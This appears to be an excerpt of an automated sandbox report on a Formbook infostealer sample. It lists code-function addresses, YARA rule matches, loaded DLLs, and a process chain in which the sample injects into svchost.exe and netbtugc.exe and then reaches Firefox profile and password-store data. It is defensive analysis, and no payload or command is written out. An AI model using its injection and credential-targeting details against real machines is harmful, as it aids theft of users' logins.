Source: C:\Program Files (x86)\iZsZrHSpCPcKUZaSYkKQgChuOiRBiyMdarZuyfLyjSJRJrbxCCb\lXlvzubPaBLtjusO.exe	Code function: 3_2_05E5D568	3_2_05E5D568
Source: C:\Program Files (x86)\iZsZrHSpCPcKUZaSYkKQgChuOiRBiyMdarZuyfLyjSJRJrbxCCb\lXlvzubPaBLtjusO.exe	Code function: 3_2_05E7AD68	3_2_05E7AD68
Source: C:\Program Files (x86)\iZsZrHSpCPcKUZaSYkKQgChuOiRBiyMdarZuyfLyjSJRJrbxCCb\lXlvzubPaBLtjusO.exe	Code function: 3_2_05E5D55F	3_2_05E5D55F
Source: C:\Program Files (x86)\iZsZrHSpCPcKUZaSYkKQgChuOiRBiyMdarZuyfLyjSJRJrbxCCb\lXlvzubPaBLtjusO.exe	Code function: 3_2_05E5D788	3_2_05E5D788
Source: C:\Program Files (x86)\iZsZrHSpCPcKUZaSYkKQgChuOiRBiyMdarZuyfLyjSJRJrbxCCb\lXlvzubPaBLtjusO.exe	Code function: 3_2_05E63E86	3_2_05E63E86
Source: C:\Program Files (x86)\iZsZrHSpCPcKUZaSYkKQgChuOiRBiyMdarZuyfLyjSJRJrbxCCb\lXlvzubPaBLtjusO.exe	Code function: 3_2_05E63E88	3_2_05E63E88
Source: C:\Program Files (x86)\iZsZrHSpCPcKUZaSYkKQgChuOiRBiyMdarZuyfLyjSJRJrbxCCb\lXlvzubPaBLtjusO.exe	Code function: 3_2_05E5B808	3_2_05E5B808
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_036BA352	4_2_036BA352
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_036C03E6	4_2_036C03E6
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0360E3F0	4_2_0360E3F0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_036A0274	4_2_036A0274
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_036802C0	4_2_036802C0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03688158	4_2_03688158
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_035F0100	4_2_035F0100
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0369A118	4_2_0369A118
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_036B81CC	4_2_036B81CC
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_036C01AA	4_2_036C01AA
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_036B41A2	4_2_036B41A2
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03692000	4_2_03692000
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03600770	4_2_03600770
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03624750	4_2_03624750
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_035FC7C0	4_2_035FC7C0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0361C6E0	4_2_0361C6E0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03600535	4_2_03600535
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_036C0591	4_2_036C0591
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_036B2446	4_2_036B2446
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_036A4420	4_2_036A4420
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_036AE4F6	4_2_036AE4F6
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_036BAB40	4_2_036BAB40
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_036B6BD7	4_2_036B6BD7
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_035FEA80	4_2_035FEA80
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03616962	4_2_03616962
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_036029A0	4_2_036029A0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_036CA9A6	4_2_036CA9A6
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0360A840	4_2_0360A840
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03602840	4_2_03602840
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0362E8F0	4_2_0362E8F0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_035E68B8	4_2_035E68B8
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03674F40	4_2_03674F40
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03642F28	4_2_03642F28
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03620F30	4_2_03620F30
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_036A2F30	4_2_036A2F30
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0360CFE0	4_2_0360CFE0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_035F2FC8	4_2_035F2FC8
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0367EFA0	4_2_0367EFA0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03600E59	4_2_03600E59
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_036BEE26	4_2_036BEE26
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_036BEEDB	4_2_036BEEDB
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03612E90	4_2_03612E90
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_036BCE93	4_2_036BCE93
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0360AD00	4_2_0360AD00
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0369CD1F	4_2_0369CD1F
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_035FADE0	4_2_035FADE0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03618DBF	4_2_03618DBF
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03600C00	4_2_03600C00
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_035F0CF2	4_2_035F0CF2
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_036A0CB5	4_2_036A0CB5
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_035ED34C	4_2_035ED34C
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_036B132D	4_2_036B132D
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0364739A	4_2_0364739A
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_036A12ED	4_2_036A12ED
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0361B2C0	4_2_0361B2C0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_036052A0	4_2_036052A0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_036CB16B	4_2_036CB16B
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0363516C	4_2_0363516C
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_035EF172	4_2_035EF172
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0360B1B0	4_2_0360B1B0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_036B70E9	4_2_036B70E9
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_036BF0E0	4_2_036BF0E0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_036070C0	4_2_036070C0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_036AF0CC	4_2_036AF0CC
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_036BF7B0	4_2_036BF7B0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_036B16CC	4_2_036B16CC
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_036B7571	4_2_036B7571
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0369D5B0	4_2_0369D5B0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_035F1460	4_2_035F1460
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_036BF43F	4_2_036BF43F
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_036BFB76	4_2_036BFB76
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03675BF0	4_2_03675BF0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0363DBF9	4_2_0363DBF9
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0361FB80	4_2_0361FB80
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03673A6C	4_2_03673A6C
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_036BFA49	4_2_036BFA49
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_036B7A46	4_2_036B7A46
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_036ADAC6	4_2_036ADAC6
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03645AA0	4_2_03645AA0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0369DAAC	4_2_0369DAAC
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_036A1AA3	4_2_036A1AA3
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03609950	4_2_03609950
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0361B950	4_2_0361B950
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03695910	4_2_03695910
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0366D800	4_2_0366D800
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_036038E0	4_2_036038E0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_036BFF09	4_2_036BFF09
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_035C3FD5	4_2_035C3FD5
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_035C3FD2	4_2_035C3FD2
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_036BFFB1	4_2_036BFFB1
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03601F92	4_2_03601F92
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03609EB0	4_2_03609EB0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_036B7D73	4_2_036B7D73
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03603D40	4_2_03603D40
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_036B1D5A	4_2_036B1D5A
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_0361FDC0	4_2_0361FDC0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_03679C32	4_2_03679C32
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_036BFCF2	4_2_036BFCF2
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00C315E0	4_2_00C315E0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00C2C7C7	4_2_00C2C7C7
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00C2C7D0	4_2_00C2C7D0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00C2C9F0	4_2_00C2C9F0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00C2AA70	4_2_00C2AA70
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00C330EE	4_2_00C330EE
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00C330F0	4_2_00C330F0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 4_2_00C49FD0	4_2_00C49FD0

Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 036AEA12 appears 86 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03675130 appears 58 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 036BF290 appears 105 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 0362B970 appears 280 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03687E54 appears 111 times
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: String function: 0366EA12 appears 86 times
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: String function: 0367F290 appears 105 times
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: String function: 035EB970 appears 280 times
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: String function: 03647E54 appears 102 times
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: String function: 03635130 appears 58 times
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe	Code function: String function: 00980D27 appears 70 times
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe	Code function: String function: 00988B40 appears 42 times
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe	Code function: String function: 00967F41 appears 35 times

Source: SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe, 00000000.00000003.2127761739.0000000004013000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe
Source: SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe, 00000000.00000003.2127928332.00000000041BD000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe

Source: SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.2279781894.00000000034C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.2278064790.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.2281187991.0000000006E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.4579123591.0000000003360000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.4573035709.0000000003040000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.4579078309.0000000005BB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.4569356332.0000000000C20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/5@13/12

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe

Code function: 0_2_009CA2D5 GetLastError,FormatMessageW,

0_2_009CA2D5

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe	Code function: 0_2_009B8713 AdjustTokenPrivileges,CloseHandle,		0_2_009B8713
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe	Code function: 0_2_009B8CC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		0_2_009B8CC3

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe

Code function: 0_2_009CB59E SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

0_2_009CB59E

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe

Code function: 0_2_009DF121 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

0_2_009DF121

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe

Code function: 0_2_009D86D0 CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear,

0_2_009D86D0

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe

Code function: 0_2_00964FE9 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

0_2_00964FE9

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe

File created: C:\Users\user\AppData\Local\Temp\aut6E13.tmp

Jump to behavior

Source: SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Program Files\Mozilla Firefox\firefox.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: netbtugc.exe, 00000004.00000003.2461051937.0000000003100000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2461183111.0000000003121000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4576762013.0000000003151000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4576762013.0000000003121000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2463171367.000000000312D000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe	ReversingLabs: Detection: 23%
Source: SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe	Virustotal: Detection: 23%

Source: unknown	Process created: C:\Users\user\Desktop\SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe"
Source: C:\Program Files (x86)\iZsZrHSpCPcKUZaSYkKQgChuOiRBiyMdarZuyfLyjSJRJrbxCCb\lXlvzubPaBLtjusO.exe	Process created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"
Source: C:\Windows\SysWOW64\netbtugc.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe"	Jump to behavior
Source: C:\Program Files (x86)\iZsZrHSpCPcKUZaSYkKQgChuOiRBiyMdarZuyfLyjSJRJrbxCCb\lXlvzubPaBLtjusO.exe	Process created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\iZsZrHSpCPcKUZaSYkKQgChuOiRBiyMdarZuyfLyjSJRJrbxCCb\lXlvzubPaBLtjusO.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\iZsZrHSpCPcKUZaSYkKQgChuOiRBiyMdarZuyfLyjSJRJrbxCCb\lXlvzubPaBLtjusO.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\iZsZrHSpCPcKUZaSYkKQgChuOiRBiyMdarZuyfLyjSJRJrbxCCb\lXlvzubPaBLtjusO.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\iZsZrHSpCPcKUZaSYkKQgChuOiRBiyMdarZuyfLyjSJRJrbxCCb\lXlvzubPaBLtjusO.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\iZsZrHSpCPcKUZaSYkKQgChuOiRBiyMdarZuyfLyjSJRJrbxCCb\lXlvzubPaBLtjusO.exe	Section loaded: fwpuclnt.dll	Jump to behavior
